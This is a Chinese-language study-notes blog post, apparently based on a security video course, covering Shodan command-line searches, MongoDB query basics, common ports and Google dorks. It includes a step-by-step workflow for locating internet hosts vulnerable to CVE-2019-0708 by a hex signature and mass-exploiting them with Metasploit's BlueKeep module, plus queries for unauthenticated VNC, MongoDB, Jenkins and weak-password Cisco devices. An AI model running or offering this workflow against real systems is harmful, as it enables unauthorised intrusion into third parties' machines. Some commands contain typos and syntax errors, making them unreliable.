声明:
学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章笔记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负
搬运于: 本人博客
学习笔记
shodan:(搜索引擎) https://www.shodan.io/
专门搜索网络设备
功能:在线查询功能,和离线的客户端,monitor(监控)可以监控一些ip地址,扫描出漏洞和bug,api接口调用
缺点:不够实时
一、安装
配置代理:
命令
shodan search --limit 10 country:jp
# 查找一些日本的IP地址 search:扫描 limit:规定数量
shodan search --limit 10 --fields ip_str,post country:jp
# fileds: 过滤ip和端口(只看ip和端口信息),ip_str:以ipv4的形式输出ip地址
shodan search --color --limit 10 --fields ip_str port:3389 country:cn city:shenzhen
# color:加深颜色
shodan host ip
# 查看ip信息
fields ip_str,port
# 过滤ip信息
--limit 10
# 显示信息数量
--color
# 深色表示
os:windows7
# 操作系统
has_vuln:True
#漏洞
device:weicam
# 设备:摄像头
device:router
# 设备:路由器
tp-link
# web端的一些设备
查漏洞:
cve-2019-0708
当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
若要利用此漏洞,攻击者需要通过 RDP 向目标系统远程桌面服务发送经特殊设计的请求。
可以看到其中利用的RDP即远程桌面端口3389,RDP协议,所带来的危害是不可估量的,当达到预想中的任意执行的攻击效果,后续利用便多种多样起来了。
复现:
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
# 16进制漏洞特征
# 将ip地址保存至0708.txt
shodan host ip
# 逐一检查第一步查出来的ip是否存在`cve-2019-0708`漏洞
使用远程桌面连接:
msf批量利用漏洞:
# 打开msf
msfconsole
# 进入0708.txt上级文件夹,批量查找漏洞
search 0708
# 进入脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
#看payload,ip端口,show target
# 拖入ip地址文件
set rhost file: ...
check
download
shodan download-h
show download filename --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
parse
shodan parse filename
#解压
shodan parse filename1 >filename2
count
shodan count '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
# 在 honeyscore.shodan.io 里查看是否位蜜罐
host
shodan host ip --history
# 查看ip的历史数据
vnc空密码连接(危险!)
shodan search --limit 10 --fields ip_str "authentication disabled" port:5900
尝试使用VNC连接:
shodan download --limit 100 "authentication disabled" port:5900
shodan myip
# 查看自己的出口ip,哪个地址连接的公网
shodan search --limit 10 --fileds ip_str,port http.titli:hacked by
# 查看已经被黑的网站
shodan search --limit 10 --fields ip_str,port "cisco -authorized port:23"
# authorized:未授权访问的特征参数
# 该条命令可以查找cisco有弱口令特征的ip
shodan search --limit 10 --fields ip_str,port net:208.22.24.0/24
# net:搜索网段
shodan search --limit 10 --fields ip_str,port org:nsa.gov
# org: 组织
shodan search --limit 10 --fields ip_str,port hostname:google
# 查找网址所在组织的ip
shodan search --limit 10 --fields ip_str,port country:cn http.waf:safedog
# 查找装了安全狗的网站
shodan search --limit 10 --fields ip_str,port http.html:login
shodan search --limit 10 --fields ip_str "Mongodb server information -authentication" port:27017
shodan search --limit 10 --fields ip_str "X-Jenkins" OR "Set-cookie:JESSONID" http.title:"Dashboard"
# "X-Jenkins"OR"Set-cookie:JSESSIONID":这是搜索条件,意味着搜索结果中要么响应头包含“X-Jenkins”,要么“Set-cookie'”的值包含“JSESSIONID”。使用0R逻辑运算符连接了这两个条件,扩大了搜索的范围
shodan search --limit 10 --fields ip_str,port product:Apache httpd
# 查找使用apache的web页面
Jenkins(概念篇):Jenkins 简介_ron jenkins 什么意思-CSDN博客
Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目(持续部署),无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。
Jenkins 是一个可扩展的持续集成引擎。
MongDB:
- nosql
- 文档型(以文档方式存储数据)
MongDB | MySQL |
---|---|
database | database |
集合(collection) | table |
文档 document | row |
字段 filed | column |
索引 index | index |
_id | primary key |
$lookup | join |
$group | group by |
下载:mongdb
GUI: mongdb for vscode
连接:mongdb://ip:27017
基础语法
# 查看当前数据库
show databases/show dbs
# 切换数据库
use 数据库名
# 创建集合
db.集合名称.insertOne({name:"tiantian"})
# 查询集合中的数据
db.集合名称.find()
db.集合名称.find().limit(1)
db.集合名称.find({name:"tiantian"},{lever:1}) #查询name为tiantian的字段,返回他的_id和level值
db.集合名称.find({level:{$gt:3}}) #查询等级大于三的用户 ($gt:> , $lt:< , $eq:=)
db.集合名称.find({level:{$gte:3,$lt:5}}) #大于等于3,小于5
db.集合名称.find({$and:[{level:{$gte:3}},{level:{$lt:5}}]}) #同理还有$or,$not
db.集合名称.find({name:{$regex:/张/,$options:'i'}}) #$regex:正则表达式查询,$options:'i':忽略大小写
db.集合名称.find({level:{$in:1,2,3}}) #查询等级为1,2,3的用户
db.集合名称.find({email:{$exists:true}}) # 查询有邮箱的用户
db.集合名称.findOne({level:{$gte:3}}) #查询满足条件的一条数据
db.集合名称.updateOne({level:1},{$set:{name:"wangwu"}}) #更新一条数据,updateMany(...)
db.集合名称.deleteOne({level:1})
# 排序查询(1:升序,-1:降序)
db.集合名称.find().sort({level:1,name:1})
db.集合名称.find().sort({level:1,name:1}).limit(2).skip(1) #跳过第一条数据
# 插入多条数据到集合中
db.集合名称.insertMany([{name:"zhangsan"},{name:"lisi",sex="女"}])
#聚合
db.集合名称.countDocuments() #统计文档数量
db.集合名称.countDocuments({level:{$gte:3}})
shodan的图形化界面
搜索漏洞'"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
摄像头:webcam
截图:has_screenshot:true cisco
(联动3389端口 =v= )
shodan domain www.baidu
# 查看域名的信息
#shodan--》非实时,实时--》scan
shodan scan submit ip #类似nmap
shodan scan list #查看扫描信息
# 统计中国使用了ssl的ip,并用版本做一个统计
shodan stats --facets ssl.version country:cn has_ssl:true http
常见端口及服务:
port | server |
---|---|
80 | HTTP |
3306 | MySQL |
443 | HTTPS |
21 | FTP |
22 | SSH |
25 | SMTP |
110 | pop3 |
143 | IMAP |
53 | DNS |
5432 | PostgreSQL数据库服务器 |
3389 | RDP(远程桌面协议) |
69 | TFTP |
137-139 | NetBIOS |
67-68 | DHCP |
Google搜索语法
inurl:admin
inurl:login
inurl:php?id=
inurl:asp?id=
inurl:jsp?id=
filetype:pdf 关键词
filetype:doc 关键词
filetype:xls 关键词
site:gov inurl:upload
site:edu inurl:forum
site: inurl:phpmyadmin
site: inurl:password
site: inurl:backup
site:.gov intitle:敏感信息
site:pany inurl:confidential # 机密
site:.domaininurl:uploads
site:.edu filetype:ppt
site:*.gov inurl:vulnerability
发布者:admin,转转请注明出处:http://www.yc00.com/web/1738011888a4010979.html
评论列表(0条)